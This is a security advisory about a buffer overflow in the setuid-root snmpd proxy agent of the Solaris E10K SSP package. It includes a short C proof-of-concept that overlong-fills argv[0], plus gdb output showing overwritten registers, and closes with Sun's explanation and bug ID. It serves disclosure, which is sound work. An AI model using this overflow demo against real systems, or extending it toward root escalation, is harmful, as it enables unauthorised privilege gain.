COMMAND

    snmpd

SYSTEMS AFFECTED

    Solaris 8

PROBLEM

    Pablo Sor found following.   The /opt/SUNWssp/snmpd command  (SNMP
    proxy agent)  is suid  root and  contains a  buffer overflow,  the
    problem occurs when it copy his own name (argv[0]) to an  internal
    variable  without  checking  out  its  lenght  and this causes the
    overflow.

        #include <stdio.h>

        void main(int argc,char **argv)
        {
        char *buf;
        buf = (char *) malloc(atoi(argv[1])*sizeof(char));
        memset(buf,0x41,atoi(argv[1])-1);
        buf[atoi(argv[1])-1]=0;
        execl("/opt/SUNWssp/bin/snmpd",buf,(char *)0);
        }

        -----------------------------------------------------

        $ uname -a
        SunOS tomy 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10

        $ ./snmpd-demo 700
        Segmentation Fault (core dumped)

        $ gdb ./snmpd-demo --core=core

        [..]

        Program received signal SIGSEGV, Segmentation fault.
        0xfee32b58 in strcpy () from /usr/lib/libc.so.1
        (gdb) info registers
        g0             0x0      0
        g1             0x78000  491520
        g2             0xff22579c       -14526564
        g3             0xff162d78       -15323784
        g4             0x0      0
        g5             0x0      0
        g6             0x0      0
        g7             0x76f98  487320
        o0             0x2c1    705
        o1             0xffbed9b9       -4269639
        o2             0x2c1    705
        o3             0x41     65
        o4             0xffbed180       -4271744
        o5             0xff26a147       -14245561
        sp             0xffbed658       -4270504
        o7             0xfee83650       -18336176
        l0             0x7efefeff       2130640639
        l1             0x81010100       -2130640640
        l2             0xff000000       -16777216
        l3             0xff0000 16711680
        l4             0xff00   65280
        l5             0x0      0
        l6             0x0      0
        l7             0x0      0
        i0             0x41414141       1094795585   ;;;;;
        i1             0xffbed6fc       -4270340     ; pointer to argv[0]
        i2             0x41414141       1094795585   ;;;;;
        i3             0x41414141       1094795585   ;;;;;
        i4             0x81010100       -2130640640
        i5             0xff00   65280
        fp             0xffbed698       -4270440
        i7             0xff265474       -14265228
        y              0x6      6
        psr            0xfe001000       -33550336
        wim            0x0      0
        tbr            0x0      0
        pc             0xfee32b58       -18666664
        npc            0xfee32b5c       -18666660
        fpsr           0x0      0
        cpsr           0x0      0

        (gdb) x/20x $i1
        0xffbed6fc:  0x41414141   0x41414141   0x41414141   0x41414141
        0xffbed70c:  0x41414141   0x41414141   0x41414141   0x41414141
        0xffbed71c:  0x41414141   0x41414141   0x41414141   0x41414141
        0xffbed72c:  0x41414141   0x41414141   0x41414141   0x41414141
        0xffbed73c:  0x41414141   0x41414141   0x41414141   0x41414141

SOLUTION

    Just for clarification this binary is NOT part of Solaris 8 it  is
    part of the SUNWsspop package which will only be installed on  the
    SSP  (System  Service  Processor)  machine  of a Enterprise 10,000
    (aka Starfire) machine.

    This package is not part of  a standard install, it would only  be
    loaded on  the SSP  of an  E10K which  if recommended  practice is
    followed would be  on a controlled  admin network, and  would only
    allow access to the users  ssp, root and perhaps application  ID's
    like patrol.   The reason  it is  setuid is  that it  is  normally
    started by the user ssp and needs to access privileged ports.

    Sun logged a  bug (Id: 4425460)  so the problem  will be fixed  in
    future releases.